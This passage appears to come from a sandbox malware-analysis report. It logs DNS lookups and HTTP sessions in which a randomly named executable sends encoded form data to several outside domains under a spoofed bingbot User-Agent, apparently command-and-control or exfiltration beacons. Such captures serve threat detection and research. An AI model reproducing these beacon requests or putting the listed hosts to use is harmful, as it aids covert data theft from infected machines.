                            Sep 26, 2024 15:25:50.708703995 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.708708048 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.708971024 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.709321976 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709357023 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709389925 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709415913 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.709534883 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709568977 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709608078 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:50.709639072 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.710269928 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.713596106 CEST4972180192.168.2.7208.91.197.27
                            Sep 26, 2024 15:25:50.718960047 CEST8049721208.91.197.27192.168.2.7
                            Sep 26, 2024 15:25:56.086170912 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.091100931 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.091195107 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.109569073 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:56.114604950 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710685015 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710710049 CEST8049722162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:56.710777998 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:57.624547958 CEST4972280192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.644197941 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.649899006 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:58.649971008 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.664242029 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:25:58.669177055 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236140013 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236231089 CEST8049723162.0.238.43192.168.2.7
                            Sep 26, 2024 15:25:59.236371994 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:00.172422886 CEST4972380192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.317977905 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.323024988 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.328234911 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.336790085 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:01.341762066 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.342034101 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.993768930 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.994129896 CEST8049724162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:01.994177103 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:02.843806028 CEST4972480192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.273736000 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.278820038 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:04.278904915 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.526388884 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:04.531466007 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119072914 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119168043 CEST8049725162.0.238.43192.168.2.7
                            Sep 26, 2024 15:26:05.119241953 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:05.122823000 CEST4972580192.168.2.7162.0.238.43
                            Sep 26, 2024 15:26:05.127666950 CEST8049725162.0.238.43192.168.2.7
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Sep 26, 2024 15:24:02.854707956 CEST | 192.168.2.7 | 1.1.1.1 | 0x6f24 | Standard query (0) | www.trapkitten.website | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:18.830842972 CEST | 192.168.2.7 | 1.1.1.1 | 0x1f94 | Standard query (0) | www.qwefs.org | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:32.830862045 CEST | 192.168.2.7 | 1.1.1.1 | 0x912b | Standard query (0) | www.dfmagazine.shop | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:46.013672113 CEST | 192.168.2.7 | 1.1.1.1 | 0xc58 | Standard query (0) | www.mktimediato.online | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:54.154818058 CEST | 192.168.2.7 | 1.1.1.1 | 0xf648 | Standard query (0) | www.disn-china.buzz | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:07.503412008 CEST | 192.168.2.7 | 1.1.1.1 | 0xdb3b | Standard query (0) | www.kevin-torkelson.info | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:08.515096903 CEST | 192.168.2.7 | 1.1.1.1 | 0xdb3b | Standard query (0) | www.kevin-torkelson.info | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:55.802151918 CEST | 192.168.2.7 | 1.1.1.1 | 0xfaa7 | Standard query (0) | www.mandemj.top | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Sep 26, 2024 15:24:02.969937086 CEST | 1.1.1.1 | 192.168.2.7 | 0x6f24 | No error (0) | www.trapkitten.website | | 195.161.68.8 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:19.186707973 CEST | 1.1.1.1 | 192.168.2.7 | 0x1f94 | No error (0) | www.qwefs.org | | 45.114.171.236 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:32.882055044 CEST | 1.1.1.1 | 192.168.2.7 | 0x912b | No error (0) | www.dfmagazine.shop | dfmagazine.shop | | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 26, 2024 15:24:32.882055044 CEST | 1.1.1.1 | 192.168.2.7 | 0x912b | No error (0) | dfmagazine.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:46.024106026 CEST | 1.1.1.1 | 192.168.2.7 | 0xc58 | Name error (3) | www.mktimediato.online | none | none | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:24:54.207243919 CEST | 1.1.1.1 | 192.168.2.7 | 0xf648 | No error (0) | www.disn-china.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:08.558958054 CEST | 1.1.1.1 | 192.168.2.7 | 0xdb3b | No error (0) | www.kevin-torkelson.info | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:08.562875986 CEST | 1.1.1.1 | 192.168.2.7 | 0xdb3b | No error (0) | www.kevin-torkelson.info | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                            Sep 26, 2024 15:25:56.081095934 CEST | 1.1.1.1 | 192.168.2.7 | 0xfaa7 | No error (0) | www.mandemj.top | | 162.0.238.43 | A (IP address) | IN (0x0001) | false
                            Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49704 | Destination IP: 195.161.68.8 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:02.991679907 CEST | 359 | OUT | GET /vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg HTTP/1.1
                            Host: www.trapkitten.website
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:03.749346972 CEST | 778 | IN | HTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:24:03 GMT
                            Content-Type: text/html
                            Content-Length: 634
                            Connection: close
                            Server: Apache
                            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                            Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49706 | Destination IP: 45.114.171.236 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:19.204349041 CEST | 608 | OUT | POST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=jHpnN1fKvmiF9EESjFZnzp56AheLqaYiSTvf7QG1SjZzhtlSb0cLzEGngdS0nreMi6Hjx466OklRbTnig3mhRWyzrpy5DtBAmSZphnclu8JnynaxEDzCC485JT+oKXxA7mwStiM1iA89Qobb4MUmTblEO/GGRxLqaeOoM0voCtJeeo18oE0xsuzXX0eyq5pe74Bl3X2C/lRUIqbW/Q==
                            Sep 26, 2024 15:24:20.048789024 CEST | 289 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:09 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49707 | Destination IP: 45.114.171.236 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:21.753019094 CEST | 628 | OUT | POST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=jHpnN1fKvmiF9k0Slmhni551PBeLj6YmSSTf7RToSR9zgIBSa1cL0EGnntSxqLeLi76Wx5G6OkxRbRPiglOuQGy1mJy/HtBAmSZphnYPu8RnyXKxWyzBcI86Dz+oAHwJ7mw8tnVSiDE9QqDb5Z4nZbkNK/HzdAqWau7XDEzjKt5oS+oeym4dy/LsT26E9f0r55F961CjgS0+F46SpitRt8Gx1pNUxICBiogPPRM=
                            Sep 26, 2024 15:24:22.593822002 CEST | 289 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:12 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49708 | Destination IP: 45.114.171.236 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:24.422683954 CEST | 1641 | OUT | POST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=[TRUNCATED]
                            Sep 26, 2024 15:24:25.278573036 CEST | 289 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:15 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 45.114.171.236 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:26.967686892 CEST | 350 | OUT | GET /toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:27.817737103 CEST | 289 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:17 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.7 | 49710 | 84.32.84.32 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:32.899966002 CEST | 626 | OUT | POST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=GPYfE0rW/9uCNMxKqSPc/swaxGenhxpyWQjM0Sp/ZgHq/9LpIAivW22jV0cUkKgyv/FNRIGVDCtMhv4QBkdqjtpp4E/FKc0YYFs2aqSCPmaG4RInFgUhjFKuH67zircYDG/DLme72NJc7WHnE4FxzzveTcmuI5BXyTXcNZ6YO9ryJ7MPlugSpnq/r2o2TEjADDBJQwyPFUfKT/CDiQ==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            6 | 192.168.2.7 | 49711 | 84.32.84.32 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:35.441225052 CEST | 646 | OUT | POST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=GPYfE0rW/9uCPtBKo1jcq8wdtWenrRppWQvM0WxvMDjq+d7pJBivbW2jdUcVpqgsv/ZFRKSVDCJMhrwQCTxrgdp3s0/HA80YYFs2ar2kPmSG4h4nEFgiplKtPa7zmrccDG+kLnSR2Pxc7SPnEpFykjvcZ8nGPKcMojLkA5/ZBNGSBtRt/Ms+32SEv0MAEi+1BCFRdSGuaj6getjH0jlWKb8P8TmfKnx0zpSY/Ww=


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            7 | 192.168.2.7 | 49712 | 84.32.84.32 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:37.986656904 CEST | 1659 | OUT | POST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            8 | 192.168.2.7 | 49713 | 84.32.84.32 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:40.530927896 CEST | 356 | OUT | GET /wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:40.978070021 CEST | 1236 | IN | HTTP/1.1 200 OK
                            Server: hcdn
                            Date: Thu, 26 Sep 2024 13:24:40 GMT
                            Content-Type: text/html
                            Content-Length: 10072
                            Connection: close
                            Vary: Accept-Encoding
                            alt-svc: h3=":443"; ma=86400
                            x-hcdn-request-id: 815381f1f14368a99c07863653f8c1d9-bos-edge2
                            Expires: Thu, 26 Sep 2024 13:24:39 GMT
                            Cache-Control: no-cache
                            Accept-Ranges: bytes
                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            9 | 192.168.2.7 | 49714 | 161.97.168.245 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:54.241308928 CEST | 626 | OUT | POST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=JioExyw+JsL3t1luZbzkWOHxBwo6/xq/4a1AoJttS/6VdB2I3f/sKfUQxybF3AKhIZvjzBo3PFyWG4nOuvI7zCNv3duC6UUcd6jW8zW5l/VqecxbHt+a3+mcy/sUzSUY035Em01fV1ypcZJbZKUTDC/UOtS9RcpDrxBrbZOaR1Mu8bK3iJyy2AUc323JoAdA3EJZDuj3n+R/TU8lvQ==
                            Sep 26, 2024 15:24:54.893639088 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            10 | 192.168.2.7 | 49715 | 161.97.168.245 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:56.783531904 CEST | 646 | OUT | POST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Ascii: Z0=JioExyw+JsL3sU1ub6zkB+HyNQo6pBqB4axAoKgySMeVdlyI0brsJfUQpCbApwKqIZSAzEQ3PFmWG5XOuYc8zSNhvtuE+UUcd6jW8zSfl/NqfvpbBJqd7emb6fsU4yUc034rm2QCV3KpcZ5bYeAQIC/ST9TaQZYtlQpxDreXYmYb9tXV4r+eoRsnz0T//mA11FNBOMXW4J0VeGdh5lFyAvh5tfiIhmP6aIRHu7E=
                            Sep 26, 2024 15:24:57.387134075 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            11 | 192.168.2.7 | 49716 | 161.97.168.245 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:24:59.332489014 CEST | 1659 | OUT | POST /za6x/ HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.disn-china.buzz
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.disn-china.buzz/za6x/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:59.948558092 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:24:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: W/"66cd104a-b96"
                            Content-Encoding: gzip


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            12 | 192.168.2.7 | 49717 | 161.97.168.245 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:01.880167007 CEST | 356 | OUT | GET /za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM HTTP/1.1
                            Host: www.disn-china.buzz
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:25:02.494323969 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 2966
                            Connection: close
                            Vary: Accept-Encoding
                            ETag: "66cd104a-b96"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
